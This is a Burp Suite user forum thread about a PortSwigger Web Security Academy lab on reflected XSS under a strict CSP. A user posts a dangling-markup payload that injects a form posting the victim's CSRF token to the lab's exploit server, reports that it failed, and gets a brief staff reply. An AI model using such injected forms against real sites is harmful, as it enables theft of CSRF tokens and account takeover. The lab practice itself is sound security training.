Burp Suite User Forum

Lab not solved - Reflected XSS protected by very strict CSP, with dangling markup attack

Yuyu | Last updated: Sep 30, 2024 02:20PM UTC

Tried https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/ and a customized script:

<script> location='https://0ab30080033b6b968b73f4a50058006d.web-security-academy.net/my-account?email="></form><form class="login-form" name="evil-form" action="https://exploit-0a590010031d6bdf8b5bf31f01490052.exploit-server.net/log" method="GET"><button class="button" type="submit">Click</button'; </script>

The bot didn't click the button and leak the CSRF token.

Ben, PortSwigger Agent | Last updated: Oct 02, 2024 10:49AM UTC

Hi, are you still having issues with this lab as of right now?